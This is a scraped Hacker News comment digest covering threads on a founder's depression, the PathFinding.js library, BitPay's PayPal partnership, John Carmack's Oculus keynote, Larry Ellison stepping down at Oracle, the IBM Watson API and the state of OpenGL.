danielweber 5 days ago 1 reply      
Slightly OT, but I read the whole thing thinking Moz was a nickname for Mozilla, or, at the least, that Moz was related to Mozilla.

It's still good to get these stories.

15
swombat 5 days ago 9 replies      
Forgive my ignorance and bluntness, but reading the above, it sounds more like an anxiety disorder than like depression. Both are serious, but I'm not sure if it helps to confuse the two?

I've not experienced either seriously, but I know people who have. Depression seems to be more about things not mattering anymore, everything being pointless, the world seeming drab and just not fun anymore, rather than feeling that everything is going to go to shit. Anxiety, though, (and I'm speaking from experience here, having had some light anxiety attacks caused by too much regular caffeine usage) seems to be characterised by a feeling of impending doom, that everything is wrong, it can't be fixed, it's all hopeless, etc. But in my (mild) anxiety attacks, like Rand, I still cared about the outcome. I just felt like there were too many problems to solve, overwhelmed, ready to say "fuck this", give up the entire thing, and start again from scratch with something completely different.

PS: Otherwise, props for the very honest and open article. Running a business is a lot of responsibility and very stressful and it can be comforting to know you're not the only one who seems surrounded by world-ending scenarios.

16
karl24 5 days ago 0 replies      
Mental illness impacts more people than cancer, diabetes, or heart disease. Unfortunately only 1/3 of people who have the illness get treatment due to cost, access, stigma, etc.

We're working on an app that uses technology to help bring clinically proven treatments to market at a price point that dramatically improve access. We are pairing this with product design that's common on the consumer web but uncommon in mental health apps to help with adherence and engagement with treatment.

I hope this isn't perceived as attempting to capitalize on a serious thread. We (the founders) have incredibly personal reasons for pursuing this problem. Many in this thread are likely ideal early adopters for the product. The general awareness that this discussion is raising is a good opportunity to reach out and ask for help as helping us will ultimately help many others.

Two ways to help:

(1) 7 question survey, < 1 min to complete: http://bit.ly/1plE2Rg

(2) contact us directly via cbtmobileapp@gmail.com if you'd like to provide insight via a more in-depth interview.

17
marklittlewood 5 days ago 0 replies      
Depression in technology is a very common condition. If you suffer from it, please know you ARE NOT ALONE. This talk is very honest, open and has some really helpful and practical advice.

http://businessofsoftware.org/2013/11/developers-entrepreneu...

18
akrymski 4 days ago 0 replies      
I've been through this at every startup I founded, but managed to pull through in the end - and I'm still hoping this startup won't be any different. I struggle to imagine if any CEO has not had a tough time like this and felt utterly depressed at least once when things weren't working out. Rather than focus on the depression aspect however, why not discuss what COULD have been done better, and what Rand and other CEOs can learn from this - because ultimately there's an important lesson there besides "depression sucks":

- Don't bet your whole business on one product. Products come and go, businesses pivot. Remember how Steve Jobs launched the Mac? He created a separate, small division for the Macintosh to directly compete with the rest of the company (working on Lisa - which wasn't going well actually). That's genius. He knew Mac is a risky project that could well take much longer than anticipated. He didn't bet the whole house.

- Start as small as possible. Moz Analytics was meant to be this giant swiss army knife right? Wrong. MVP lessons still apply. Couldn't you have launched the new brand with a tiny set of core features? Broke it into a modular setup where consumers could pay for features/modules in the future as you develop them?

- Iterate. Real artists ship, remember? Agile software development and all that? Doesn't sound like you had clearly defined iterative goals that you were hitting as you went, because then you'd really have an idea for where you are in the software development process. You seemed to have to go on someone's word on this. Instead you should have been producing A product every month with an increasing set of features. That way you could have still launched on time, but with less features.

- Review your progress often, and don't lose sight of the grand mission. Being smart doesn't help here - it often makes you stubborn, and I've got the same issue. But sometimes you need to have that thc-truffle, take a step back and think how else you could allocate your resources. Are there some other opportunities that the business can simultaneously pursue with a small set of resources as a backup plan? Are there some major M&A deals that can be done to shuffle things around? Do we need to hire more staff / or let people go who aren't hitting the deadlines? Drastic times call for drastic measures. The biggest issue with depression is that deep inside you still expect things to just get better on their own. And as they don't, you feel worse. Well the bad news is they won't get better on their own. You have to do something about it.

- Don't fail to communicate. The value of your business is in its passionate community, not one product. Seems like there are lots of people passionate about SeoMoz. Instead of shutting yourself out due to what appeared to you as a product failure, perhaps you could have engaged the community in the process, help you establish the product roadmap for the features you should be rolling out first, and try to understand why 90k of sign ups failed to try out the product.

19
ryanobjc 5 days ago 2 replies      
We talk a lot about successes.

It's also good to talk about failures, both partial and more complete.

And redemption.

The road to victory is long, and I would put my back against Rand because I know this struggle has made him better.

20
autism_hurts 5 days ago 2 replies      
I cannot stress how much exercising to exhaustion daily (read: Crossfit) and eating healthy (Slow Carb / Paleo) impacted my depression.

Please try them before you medicate.

21
austengary 5 days ago 0 replies      
Not an overnight fix. But with sustained effort, meditation changed my life. Eventually other things fell in place. Diet, exercise, relationships, mental health. Buddhist teachings really helped too.

I started here. http://headspace.com

22
DanBC 5 days ago 0 replies      
Here's what the English "National Institute for Health and Care Excellence" say: https://www.nice.org.uk/guidance/CG90
23
l33tbro 5 days ago 1 reply      
As somebody who is not depressed, it is always confronting to see just how hard depressed people are on themselves.
24
x0x0 5 days ago 0 replies      
Wow, props to Rand for sharing this.

Rand, if you're reading this, two things occur:

1 - you're far from the first person to go for big-bang software releases (though listening to your cto is probably a good idea)

2 - in _Fooled By Randomness_ by Taleb (I believe, I could be misremembering) he describes the incredible level of stress that monitoring his investments daily created. I seem to recall the author writing that he simply was unable to monitor them every day and instead had to only look at some periodic summaries. Perhaps this may help people who get too mentally exhausted looking at numbers daily? I mean, it's good to notice immediately if they crater, though that can be scripted. Beyond that, there's probably not much value looking at them 7 days a week that you don't get looking at them once every seven days. I use the same technique on the elliptical machine; time crawls if I look at the timer, so it's an exercise of will to go as long as possible before looking.

Hope he's in a better place now.

25
andreash 5 days ago 0 replies      
One of the most honest blog posts I've ever read.
26
Siecje 5 days ago 0 replies      
alt="launch-is-moved-email"
27
thinknothing 5 days ago 0 replies      
I started writing poetry when i got depressed - www.thinknothing.co
21
PathFinding.js
331 points by WestCoastJustin  3 days ago   25 comments top 13
1
reitzensteinm 2 days ago 2 replies      
One trick I've used quite a bit in games I've written is to do a breadth-first search of the entire playfield, with no termination, resulting in data for how to get from any tile to the destination.

This has a few nice advantages:

* Breadth first is trivially broken up to iterate over multiple frames, amortizing the cost of visiting each tile

* It reduces the worst case as the number of enemies scales up but the destination counts are low.

* The implementation in general is very simple

* You can still early terminate if you keep track of the farthest distance a pathfinding layer needs to satisfy.

* No pathological, worst case situations where a playfield becomes very expensive to pathfind. An open field is the worst case.

I first used this in Robokill, a flash game which often had 20+ enemies on the same screen tracking the player. I estimated at the time that it cost about as much as doing A* on ~5 enemies.

In games, the worst (common) case is basically all that matters - a constant 60fps is significantly better than 100fps dropping to 30fps occasionally.
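The unterminated breadth-first search described in the comment above, as an added example (not reitzensteinm's code and not part of PathFinding.js). It goes slightly beyond the comment by also showing the per-frame budget and the lookup that many enemies share; the grid encoding, class and function names are assumptions.

```javascript
// Added illustration; grid encoding, names and the per-frame budget are assumptions.
const WALL = '#';
const DIRS = [[1, 0], [-1, 0], [0, 1], [0, -1]]; // 4-connected movement

// Constructed sample playfield: '#' wall, '.' floor, 'P' destination (player).
const SAMPLE_MAP = [
  '.......',
  '.###.#.',
  '...#.#.',
  '.#.#...',
  '.#...#P',
];

class DistanceField {
  constructor(rows, destX, destY) {
    this.rows = rows;
    this.h = rows.length;
    this.w = rows[0].length;
    // dist[i] = steps from tile i to the destination, -1 = not reached (yet).
    this.dist = new Int32Array(this.w * this.h).fill(-1);
    this.queue = [destY * this.w + destX];
    this.head = 0; // index of the next tile to expand; avoids Array.shift()
    this.dist[this.queue[0]] = 0;
  }

  inBounds(x, y) { return x >= 0 && y >= 0 && x < this.w && y < this.h; }

  get done() { return this.head >= this.queue.length; }

  // Expand at most `budget` tiles, then return whether the field is complete.
  // Calling this once per frame spreads the search over several frames.
  step(budget = Infinity) {
    let expanded = 0;
    while (!this.done && expanded < budget) {
      const cur = this.queue[this.head++];
      const cx = cur % this.w;
      const cy = (cur - cx) / this.w;
      for (const [dx, dy] of DIRS) {
        const nx = cx + dx, ny = cy + dy;
        if (!this.inBounds(nx, ny) || this.rows[ny][nx] === WALL) continue;
        const ni = ny * this.w + nx;
        if (this.dist[ni] !== -1) continue; // already visited
        this.dist[ni] = this.dist[cur] + 1;
        this.queue.push(ni);
      }
      expanded++;
    }
    return this.done;
  }

  // -1 for walls, unreachable tiles, tiles not reached yet, or out of bounds.
  distanceFrom(x, y) {
    return this.inBounds(x, y) ? this.dist[y * this.w + x] : -1;
  }

  // Any enemy on any reached tile moves to a neighbour one step closer.
  nextStep(x, y) {
    const d = this.distanceFrom(x, y);
    if (d <= 0) return null; // at the destination, or no known route
    for (const [dx, dy] of DIRS) {
      if (this.distanceFrom(x + dx, y + dy) === d - 1) return [x + dx, y + dy];
    }
    return null;
  }

  // Full route as [x, y] pairs, or null when the start tile has no route.
  pathFrom(x, y) {
    if (this.distanceFrom(x, y) < 0) return null;
    const path = [[x, y]];
    let cur = [x, y];
    while ((cur = this.nextStep(cur[0], cur[1])) !== null) path.push(cur);
    return path;
  }
}

// Locate the 'P' tile in a map given as an array of equal-length strings.
function findDestination(rows) {
  for (let y = 0; y < rows.length; y++) {
    const x = rows[y].indexOf('P');
    if (x !== -1) return [x, y];
  }
  throw new Error('map has no destination tile');
}

// Build the field with a fixed tile budget per frame; report frames used.
function buildOverFrames(rows, budget) {
  const [px, py] = findDestination(rows);
  const field = new DistanceField(rows, px, py);
  let frames = 0;
  do { frames++; } while (!field.step(budget));
  return { field, frames };
}
```
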

2
curiousAl 3 days ago 0 replies      
Wow, this is a fantastic visualization of algorithms with scary doctoral-thesis-y names. I love visualizations that make scary things simple.
3
tokenizerrr 3 days ago 1 reply      
Very nice. If the author is the submitter or sees this, could you please provide some details on what kind of libraries and techniques have gone into creating this? A blog post or something would be great.
4
newbrict 3 days ago 1 reply      
The recursive visualization is really slow on even moderately complex graphs, otherwise it's a really neat tool
5
noiv 2 days ago 0 replies      
The above pathfinder is much faster with a binary heap, https://github.com/bgrins/javascript-astar and can be heavily optimized if you know your engine. With SpiderMonkey I get fixed cost of around 1ms for initialization and it checks nearly 2000 nodes in 1ms on a 3Ghz Core Duo with a relatively costly euclidean heuristic. So worst case on a 40x50 map is ~2ms. If worst case can be avoided upfront you'll always get a response within 2ms even with a 2000 nodes long path on most maps. It is amazing what one can do with JS nowadays.
6
jMyles 3 days ago 2 replies      
In my first bit of play, I just tried to find cases where Manhattan lost to the others. It seems like Manhattan is not as good when faced with a plausible path only to be thwarted at the end - is this right?

Can you show a few cases where Manhattan loses by a landslide?

7
tejon 3 days ago 0 replies      
Of course it's a gray link... but wow, major enhancements since ~1 year ago when I was on my pathfinding binge. Good stuff! Never did implement full jump-point optimization, though I got halfway there by manipulating queue priorities.
8
iandanforth 2 days ago 1 reply      
None of these appear to work in an intuitive fashion. Are there algorithms that better resemble biological strategies? If I create a large walled area, I expect an entity to explore in one direction with a preference with external walls, miss areas and completely fail sometimes.

Here's a cute and furry demonstration of biological pathfinding: https://www.youtube.com/watch?v=HRd5WYrnML4

9
muhuk 2 days ago 0 replies      
In case you miss the tiny link, here's the source: https://github.com/qiao/PathFinding.js
10
diziet 2 days ago 0 replies      
For a similar problem, check out http://www.pathery.com/ - create the longest possible maze with X blocks.
11
jokoon 2 days ago 0 replies      
I recently implemented A* with the help of this website, which really explains it well.

http://www.redblobgames.com/pathfinding/a-star/introduction....

I also used a method to create discrete path between cells, to straighten the path when possible.

12
poseid 2 days ago 1 reply      
I wonder if something like this could be used to automatically place components in an electrical circuit (PCB)
13
jwklemm 3 days ago 0 replies      
Really useful library and great visualizations. I'm having flashbacks to my CS algorithm analysis class.
22
BitPay and PayPal
307 points by seansoutpost  1 day ago   144 comments top 11
1
trevordev 1 day ago 6 replies      
BitPay sponsored angel-hack Seattle that I participated in this summer. Their developer api was horrible and poorly documented, wasting everyone's time. I was in one of the few groups that got it to work. When asking when we would find out who won the 5 bitcoin prize for best use of it we were told to contact bitpay. I contacted them multiple times and support told me to contact their CEO who ended up not responding to my emails. I will not use bitpay in the future.
2
andrewljohnson 1 day ago 4 replies      
3
rcraft 1 day ago 6 replies      
Is paypal just ignoring the IRS' recent guidelines that bitcoin is treated as property?

From http://www.bloomberg.com/news/2014-03-25/bitcoin-is-property...:

Today's IRS guidance will provide certainty for Bitcoin investors, along with income-tax liability that wasn't specified before. Purchasing a $2 cup of coffee with Bitcoins bought for $1 would trigger $1 in capital gains for the coffee drinker and $2 of gross income for the coffee shop.

It's challenging if you have to think about capital gains before you buy a cup of coffee, he said.

4
canvia 1 day ago 0 replies      
It wasn't just BitPay, also Coinbase and GoCoin: https://www.paypal-community.com/t5/PayPal-Forward/PayPal-an...
5
earthmeLon 11 hours ago 0 replies      
Hmmmm... I thought that a large reason many people helped develop bitcoin and its community was to thwart Paypal, its highly-politically-motivated nature, and others like it.
6
highercenter 1 day ago 0 replies      
More choices in how people create value, share it, buy, sell and trade it, that's exactly what PayPal is all about, said Scott Ellison, Senior Director, Strategy, PayPal.

That's amazing! And me thinking PayPal was all about our money!

7
jtwebman 21 hours ago 0 replies      
What do you guys think of Coinbase? Is it a good replacement for BitPay? Sorry I am new to this area but wanted to start accepting Bitcoins
8
appleflaxen 1 day ago 0 replies      
Nothing could make me less interested in BitPay. PayPal is just such a negative connotation in my mind that it turns me off of a business partner just to know they are collaborating.
9
ssteinb 1 day ago 1 reply      
Paypal is going to acquire the shit out of them. Calling it now.
10
Everhusk 1 day ago 0 replies      
This is really big news for bitcoin, BTC-e is taking off.
11
SuddsMcDuff 1 day ago 1 reply      
Looks like winkdex.com has gone down under the load
23
Keynote by John Carmack at Oculus Connect 2014 [video]
287 points by ivank  4 days ago   48 comments top 16
1
iamshs 3 days ago 2 replies      
I am only 10 minutes into this talk, but John is one awesome speaker. No PR talk at all, he is speaking his mind freely and in fact started with shortcomings of the product. The segue between different sections is so smooth. I do not have background in VR, but he explains things so smoothly. He is just freely talking about supply chain, and what the product constitutes. And he has been standing in the same spot. What a genuine speaker. Also, looks like Facebook's influence has been minimal. There is just no iota of bullshit in him. I like him already. My first John Carmack video, and I am already hooked. Now onto watching the full video.
2
Laremere 4 days ago 1 reply      
I love it when John Carmack talks, because he doesn't do marketing speak, and he doesn't dumb down his content. It's just a brain dump of technical info until they (almost literally) kick him off the stage.
3
gnarbarian 4 days ago 0 replies      
Carmack has been a hero of mine since the mid 90s. He was also the inspiration for me to go into computer science. Always a pleasure to listen to such a technically dense talk on the cutting edge of a subject dear to me. I highly recommend his quake-con keynotes as well for those of you who like this video.
4
webwielder 4 days ago 3 replies      
Perhaps even more impressive than Carmack's technical chops is his ability to stand in a single spot for hours on end.
5
jayavanth 3 days ago 1 reply      
Michael Abrash's keynote is worth checking out! https://www.youtube.com/watch?v=KS4yEyt5Qes
6
justifier 3 days ago 3 replies      
it becomes its own form of marketing speech, carmack was the reason i got involved: financially, temporally, and mentally; and i think the organisation understands this as common for a number of people.. especially 'developers'

the oculus is digital stereoscopy

which is hard with simple stationary fixed objects(i), but combine it with inferred spherical screen encapsulation and it becomes a real challenge, probably a fun one too

you let carmack wax poetic on his interesting ideas to fix this tech and he will talk about latency and hertz and i'll listen with bated breath because i like hearing people talk about solutions to problems

but then i put the headset on and i realise these are hardly the problems befallen the proposed goal

i want someone to address that piece of a person that is lost when they put the headset on for the first time, it almost appears physical when you see it waft out of them

i lost it, my gamer friend who already preemptively developed a defensive cynicism to the tech lost it, the eleven year old i introduce hacking to lost it, and that last one was probably the most significant for me to see

i had been using the object sitting on top of my bookshelf as an incentivising mechanism: 'finish your project and i'll let you use the oculus'; last week he pushed his finished project but i had other obligations the following week so he had to wait 'two! whole! weeks!' to get to use the oculus

when i picked him up the following week, uncharacteristically early this time.. we both are lax in our punctuality but he refused to let me be late today so he came directly to me fifteen minutes early.. he went on and on about how he has been 'scared' all day: 'scared, but like happy scared'; i tried to explain to him the concept of anxiety but his mind was hurling itself around all of what he was about to become witness to

i put the headset on him and he had fun with it, but when he took it off he became suddenly very pragmatic in his demeanor, he told me he thinks it hurt him, his head, his eyes, something.. he needed a glass of water, i explained that that was because instead of being a virtual reality in which he was transposed to the thing exploits an optical illusion which means your brain is doing a lot more work than it usually does trying to rectify the inconsistencies, if you've ever been frustrated by trying to see a sailboat in a magic eye you know what it feels like to use the oculus

i asked him his opinion: 'honestly? ..well, unfortunately a little disappointed';

i see my position as creating a safe environment for him to develop his ideas so naturally i challenged him to explain himself by defending the technological feat that he was holding in his hand, but the only thing we could talk about quickly became anything other than what we wanted to talk about

so we talked about the tech, i started going all carmack on him and we had fun talking tech but the conversation was clearly avoiding talking about the 'experience' one develops when wearing the headset

i wanted to know what he lost, and asked him to describe the thing he thought it was going to be, he was unable: 'i don't know, just different, like? more 3d`ish'; in fashion i told him to explain himself explicitly stead superficially: 'but what does that mean? what did you think it was going to be? describe that to me';

'i don't know anymore'

this i understood, but my experience was different, after wearing the headset i started to dream up better ways to do what i thought they were trying to do before i put it on, ways to do what i wanted from virtual reality, they are dreams and some built on the sort of technological feats of dreams but this was and still is my reaction each time i wear it

so yes john, tell me all about your brilliant ideas for fixing latency issues because this stuff is fun, but please acknowledge the baseline of this research is fundamentally flawed as it pertains to the proposed goals

i've stopped calling the oculus virtual reality, the oculus is digital stereoscopy

.

.

.

.(i) the first thing i did with the oculus was pull up two terminals, cat out some of my writing, align vertically, then slowly move one terminal into the field of view of the other eye until the text seemed to stop wonking my brain and really pop out at me

the experience was profound

so, i threw together a little browser playground with two 117px squares, one blue and one pink, i aligned them vertically then again slowly moved one into the field of view of the other eye, and i waited until those two distinct colors overlaid in my mind as a single purple

herein lies the problem: there was a multi pixel range where my brain would close the gap manually, out of my control and rather forcibly; it was impossible for me to find the perfect distance between the two divs, 340pxs worked but so did plus or minus 4px from 344px, the perfect'exact`preferred`innate distance was undiscoverable because of the exception handling in my brain's interpretation of my visual input

.. edit:: gramm`err

7
asadlionpk 3 days ago 0 replies      
Just finished watching, I am impressed at how low-level/technical he can get without boring or confusing the audience.

I have some experience with technical speaking and it's very hard to make a technical point without dumbing it down for the audience.

8
lucasgw 3 days ago 2 replies      
I was in the room - he is a truly dynamic speaker and obviously a super-intelligent guy. I think he went off the rails a bit with the suggestion of interlacing as a potential solution. That makes little sense to me. It's, at best, a short-term solution once you get fast enough displays and rendering. (And as an old-time video guy... just... god, please... no...)
9
asciimo 3 days ago 1 reply      
While listening to all of the mitigation strategies that Carmack proposed for the technological challenges, I wondered if you could hack the user. What about drugs? Is there something that can reduce our sensitivity to low-frequency displays and yaw lag? At the very least, motion sickness drugs?
10
Jacky800 2 days ago 0 replies      
John Carmack is a great technical speaker. His interesting thoughts flow in a continuous stream and as a listener it's almost impossible to get distracted.

I wish Carmack would do an interview like the one in "Coders at work" format where we can get some insight on

How he approaches debugging,

what tools he uses apart from visual studio.

How does he approach an already existing large code base?

What is the optimal duration to code without interruption.

What techniques does he use to get into flow state, etc.

11
riffraff 3 days ago 1 reply      
Sorry for the somewhat lame question, but is he always that still?

I'm 10 minutes in and I don't think he moved his feet once, and his right hand just a couple times.

It feels very weird for me to watch and I just noticed it now, is there something wrong with me?

12
walterbell 3 days ago 0 replies      
Nice use of keynote to directly present requirements to engineers throughout the display supply chain, especially in large companies like Samsung.
13
vertis 3 days ago 0 replies      
This keynote was by far the highlight of the entire conference for me

Second were the amazing demos on the Crescent Bay prototype

14
Kenji 3 days ago 0 replies      
Nothing Carmack does is ever boring. This man is a huge inspiration for me.
15
Vanayad 3 days ago 1 reply      
Can anyone tl;dr the new stuff in this version of the oculus prototype ?
16
bsaul 3 days ago 1 reply      
Anyone's got a link to the slidedeck ?
24
Larry Ellison Will Step Down as CEO of Oracle, Will Remain as CTO
271 points by jhonovich  6 days ago   89 comments top 13
1
chollida1 6 days ago 5 replies      
Interesting that they name Co-CEOs in Catz and Hurd. I wonder how that will work, especially given Hurd's "tough to work with" reputation.

Interestingly Ellison will be the CTO. This could be a shit show with 3 people trying to run the show!

I mean does anyone really expect Larry Ellison to start taking marching orders. Will be interesting to watch the short interest on this company!

I think the two headed CEO is what the street expected all along as Catz has been around forever and a lot of people thought that Hurd, the former HP CEO, was promised the CEO title when Ellison resigned.

It looks like they, Catz and Hurd, will split the running of day to day operations as Hurd gets sales, marketing and strategy reporting to him, while Catz will continue to have finance, legal and manufacturing.

It's down about a dollar after the close on about a third higher trading volume than normal. So it doesn't look like anyone is "spooked" by the news.

2
dm8 6 days ago 1 reply      
If you want to read about Larry Ellison's personality and his management style, you should read - "The Difference Between God and Larry Ellison: Inside Oracle Corporation; God Doesn't Think He's Larry Ellison". (http://www.goodreads.com/book/show/181369.The_Difference_Bet...)

It's one of the best books written on him and the way he managed Oracle right from its beginnings. He was damn good at selling things.

3
mindcrime 6 days ago 1 reply      
Not really sure what to say about this. I don't know Ellison, nor do I own Oracle stock, or have any particular interest in Oracle per se. But nonetheless, I've always seen Ellison as an important character in our industry, and after reading a biography about him, I felt a sort of kinship with him based on some shared interests.

At any rate, it definitely feels like the "end of an era" in a sense. I got my start in this industry in the mid to late 90's when Oracle, IBM, Novell, Microsoft, Borland, etc. were duking it out for supremacy, and - for better or worse - you've never really been able to escape Oracle's shadow to some extent. And Ellison was Oracle, in so many ways.

Edit: It's been a while, but I think this[1] was the biography I read. I'll just say this: regardless of what you think of Ellison, he's an interesting character and reading about the history of Ellison / Oracle is quite fascinating.

[1]: http://www.amazon.com/Softwar-Intimate-Portrait-Ellison-Orac...

4
smacktoward 6 days ago 0 replies      
I'm guessing he wants to spend more time wringing extortionate license fees out of his family?
5
ChuckMcM 6 days ago 1 reply      
Demonstrating once again that tech companies really don't "get" succession planning :-) I'm kind of half joking, if you look at a bunch of 'old school' BigCorps, the progression is (CEO->Chairman, SVPx -> CEO, VPx -> SVPx) and then the Chairman of the board retires and the CEO takes on both roles Chairman and CEO, priming the pump for the next cycle.

Co-CEOs have so far been an experiment in disaster, something about not having an ultimate authority seems to really crimp organizations. I wish Oracle well but they have a lot of challenges to overcome, if I were a shareholder I wouldn't be all that pleased with this arrangement as it seems to basically leave all the same people in place with all the same problems (Amazon/Google EC2/GCE, MySQL vs NoSQL vs expensive Oracle, Cheap Clusters with High Reliability vs Expensive Servers, Etc.)

6
bsimpson 6 days ago 0 replies      
Someone in The Verge's comment section noted that this Forbes list will now need to be updated:

http://www.theonion.com/articles/forbes-releases-2014-list-o...

7
spindritf 6 days ago 1 reply      
The final Larry Ellison scorecard: Oracle stock is up 89,640% since he took the company public in March 1986.

https://twitter.com/dkberman/status/512700128801464320

8
turar 6 days ago 9 replies      
Co-CEOs? I only know one company that had co-CEOs, and that didn't work out well for them.
9
sebst 6 days ago 0 replies      
10
joelrunyon 6 days ago 4 replies      
Are there any more details into why he's doing this?
11
azifali 6 days ago 0 replies      
The end of an era for Oracle that existed as a software (licensing) company. I think that Ellison stepping in as the CTO is probably more important than him stepping down as the CEO.

This move will perhaps lay the groundwork for the next tens of billions in revenue for Oracle, in cloud based software and infrastructure.

12
sebst 6 days ago 1 reply      
Will Oracle then become better? Maybe as good as Sun used to be?

just dreamin'...

13
justinph 6 days ago 3 replies      
What is with the capitalization on the headline on Recode? I read it and thought, who is "Will Remain"?

It should be: Larry Ellison will step down as CEO of Oracle, will remain as CTO

Headline capitalization is pretty easy: Capitalize the first word, then any proper nouns. That's it.

25
IBM Watson API
279 points by miket  20 hours ago   82 comments top 13
1
pesenti 19 hours ago 13 replies      
IBM is about to make these APIs (and many others) much more accessible as part of BlueMix (https://ace.ng.bluemix.net/ - the IBM PaaS/Heroku). I lead the team in charge of developing the Watson platform. Ask me questions!
2
mooreds 19 hours ago 1 reply      
If you want access to the API, you have to fill out a form, here: http://www.ibm.com/smarterplanet/us/en/ibmwatson/form_ecosys...

This is buried in the docs as a comment on this page: https://developer.ibm.com/watson/docs/developing-watson-apis...

Edit:

No real support for 'playing around' with the API. Bummer.

Edit2:

Just went through the application process linked above. Be prepared to give info about yourself and your company and an explanation of why you want access to the Watson API, as well as what type of information you'll be working with. I stated 'just want to play around with the API'. We'll see how they react to that.

3
readerrrr 20 hours ago 4 replies      
Out of curiosity I googled the same request.

https://www.google.com/search?hl=en&safe=off&q=%22His+1983+h....

I think this might be useful if Watson was being fed with a medical database. Otherwise I don't see any need for it; is there any?

edit: Watson as a legal consultant would be great. There might be a product in that, not as a replacement for a lawyer but more as guide/search tool.

4
malanj 20 hours ago 4 replies      
Has anyone at HN used either IBM Watson or Wolfram Alpha to build a real (commercial) app? It feels like there should be a whole wave of apps built on either of these technologies but it doesn't seem to be materialising.

What is holding back the killer apps for answer/computation engines?

5
mark_l_watson 14 hours ago 0 replies      
I am helping a customer integrate Watson into their system so I am very happy to see the news about BlueMix (https://ace.ng.bluemix.net/) that apparently will allow me to keep experimenting with Watson after my consulting engagement is complete.

If you read the documentation, you will see that preparing training data and questions is fairly straightforward.

6
beebs93 6 hours ago 0 replies      
I sent an e-mail to my co-workers containing "...natural English to ask Watson..." and somehow people read it as "You can ask Emma Watson, who is English, a question and she will respond".

And I thought, "...close enough - Watson could answer questions about Emma".

7
mooreds 19 hours ago 0 replies      
I found the link above to be a bit useless as it jumps right into getting answers with evidence. Here's a better overview link: https://developer.ibm.com/watson/docs/developing-watson-apis...
8
Tyrant505 15 hours ago 0 replies      
Does this also give access to their cooking and recipe data?

Edit: http://www.ibm.com/smarterplanet/us/en/cognitivecooking/

9
kyberias 10 hours ago 0 replies      
Looking at that example, I wonder why that Porcaro quote is listed as evidence. It doesn't relate to Jackson's album at all.
10
yatoomy 13 hours ago 0 replies      
I've been looking into Watson's new application to analytics etc. How would that compare to say Mathematica or the Wolfram Language/Data Science Platform?
11
ilaksh 19 hours ago 1 reply      
So you just ask it any random question and it knows everything? Or only things that come up on Jeopardy?

I don't see an API for feeding it information.

12
Doublon 20 hours ago 0 replies      
"Questions" in the documentation without question mark (?) seem somehow wrong to me.
13
80ProofPudding 16 hours ago 0 replies      
Waiting for my coffee to brew, I read that as "Emma Watson API".
26
OpenGL in 2014
281 points by ingve  3 days ago   115 comments top 15
1
c3d 3 days ago 1 reply      
The multiplicity of APIs demonstrates that the problem is hard. The needs of game developers pull the APIs in a specific direction. And these requirements must be addressed, because the games market is huge and pushes the envelope.

But other users may have different needs. OpenGL is used by games, but not just games. For example, at Taodyne, we use OpenGL for real-time 3D rendering of business information on glasses-free 3D screens. I can tell you that my pet peeves with OpenGL have nothing to do with what's being described in any of the articles.

Some of the top issues I face include 3D font rendering (way too many polygons), multi-view videos (e.g. tiled videos, which push texture size limits, or multi-stream videos, that bring a whole bag of threading issues), large numbers of large textures without the ability to manually optimise them (e.g. 12G of textures in one use case).

Heck, even the basic shader that combines 5, 8 or 9 views into one multiscopic layout for a lenticular display makes a laptop run hot for a mere HD display, and requires a rather beefy card if you want to have any bandwidth left for something else while driving a 4K display.

Many of these scenarios have to do with limitations of textures sizes, efficient ways to deal with complex shapes and huge polygon counts that you can't easily reduce, very specific problems with aliasing and smoothing when you deal with individual RGB subpixels, etc.

Of course, multiscopic displays are not exactly core business right now, so nobody cares that targeting them efficiently is next to impossible with current APIs.

2
fizixer 3 days ago 0 replies      
It seems no one has mentioned the Longs Peak fiasco yet, which is an important part of understanding OpenGL history and the committee(s) in charge of the standard:

http://en.wikipedia.org/wiki/OpenGL#Longs_Peak_and_OpenGL_3....

TL;DR: This is not the first time people are pissed at OpenGL. Last time when industry, developers, etc were sick and tired, around 2006-2007, and it was decided to do something about the API, an effort was initiated. Once the work was close to finishing, those who had seen the glimpse of this yet-to-be-released API were excited and were eagerly waiting for the release. Then the OpenGL committee vanished from the scene for a year or so, and when it re-appeared, it released the same old shitty API with a handful of function calls on top of that.

3
zerebubuth 3 days ago 2 replies      
OpenGL might well be the "only truly cross-platform option", but it seems to me that, for games or mobile app development, getting stuff drawn on screen is only part of the problem. The rest is about doing so with the minimum use of cycles - either for better frame rates or better battery life. I can easily imagine that this is a classic 80/20 problem, with the 20% that takes 80% of the time being adequate ("butter smooth") performance.

So, given that the capabilities of the graphics hardware can vary a lot, how closely can a single, unified API like glnext approach optimal use of the hardware? And without the kinds of platform-specific code paths which are necessary under current OpenGL?

4
sheng 3 days ago 4 replies      
All the whining and complaining makes me wonder how anyone was able to write something with OpenGL at all. This is fascinating because a great amount of people were actually able to write awesome Games and Applications with this API.

Look at the whole lot of mobile devices. I have no numbers to base this statement on but I would be bold enough to claim that OpenGL is thanks to the multiplatform ability by far the most successful graphics API out there. The set of devices that brings some or another form of OpenGL support outnumbers other graphics platforms. This alone is a huge accomplishment. Heck, even Minecraft was able to run on PowerPC systems until they pushed the java version supported[1].

But now I need to look at the link and have to admit that the criticism is still correct. The API is still pretty rough and could see some improvements. I know this myself, I also played around with OpenGL at some point. There is a lot of boilerplate code that needs to be written before you can start yourself with the real game. This was always the case. This is why we always had an engine, a framework to build on.

But to say that it all is a huge pile of shit is a little bit harsh

[1] https://help.mojang.com/customer/portal/articles/884921-mine...

5
pjmlp 3 days ago 1 reply      
Now they just have to create ONE single API, instead of forcing everyone to write multiple code paths to target the various flavours, extensions and drivers workarounds.

Specific graphics APIs only matters when graphics middleware is not an option.

Which OpenGL always requires. Since the standard leaves out how image/shader/texture/fonts/GUI/math are handled.

I think the commoditization of engines will be the second coming of the OpenGL 2.0 - 3.0 stagnation, if they don't improve on these areas.

6
maaaats 3 days ago 1 reply      
We need OpenGL as an alternative. What would Direct3D have been today without competition? But at the same time, GL is such a PITA to use directly that I don't bother without some middleware abstracting it away.
7
bhouston 3 days ago 1 reply      
Great article, thank you! Any news as to when we will get a WebGLNext?
8
frozenport 3 days ago 0 replies      
We all got messed up with the transition to OpenGL 4 and now we are gonna have another OpenGL? I don't see OpenGL getting out of this funk until the language you learn today will be useful tomorrow. Perhaps, a new API is a step in the right direction but things are gonna hurt bad bad for years to come, especially when OEMs don't support the API.
9
fulafel 3 days ago 0 replies      
On Linux you could in principle use the lower level hardware specific command issuing APIs as well. Mesa is not a privileged library.
10
shurcooL 3 days ago 1 reply      
My current approach is to use Go and target WebGL as the lowest common denominator, but with OpenGL (and/or OpenGL ES) backends as well.

That way graphics code written once can run on OS X, Linux, Windows, browser (including iOS).

11
illumen 2 days ago 1 reply      
WebGL

